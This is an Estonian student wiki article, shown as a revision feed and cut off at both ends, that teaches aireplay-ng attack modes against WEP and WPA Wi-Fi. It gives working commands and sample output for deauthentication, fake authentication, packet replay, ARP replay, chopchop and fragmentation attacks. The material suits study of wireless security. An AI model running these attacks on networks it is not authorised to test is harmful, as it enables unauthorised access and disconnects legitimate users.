Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -7  -h CC:CC:CC:CC:CC:CC -D mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32800</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32800"/>
		<updated>2011-05-24T19:26:43Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 7: Client-oriented fragmentation attack */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0&lt;br /&gt;
       Read 165 packets...&lt;br /&gt;
&lt;br /&gt;
         Size: 86, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
 &lt;br /&gt;
         BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
         Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
         Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._..&amp;quot;&lt;br /&gt;
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C&lt;br /&gt;
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s&lt;br /&gt;
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...&amp;gt;.q.r.e.i.&lt;br /&gt;
         0x0050:  cfeb 4a72 be46                           ..Jr.F&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&lt;br /&gt;
 Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 &lt;br /&gt;
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms&lt;br /&gt;
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms&lt;br /&gt;
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms&lt;br /&gt;
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms&lt;br /&gt;
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms&lt;br /&gt;
 ...&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0001-123457.cap&lt;br /&gt;
 Saving keystream in replay_dec-0001-123456.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
Waiting for a data packet...&lt;br /&gt;
Read 96 packets...&lt;br /&gt;
&lt;br /&gt;
      Size: 120, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
&lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
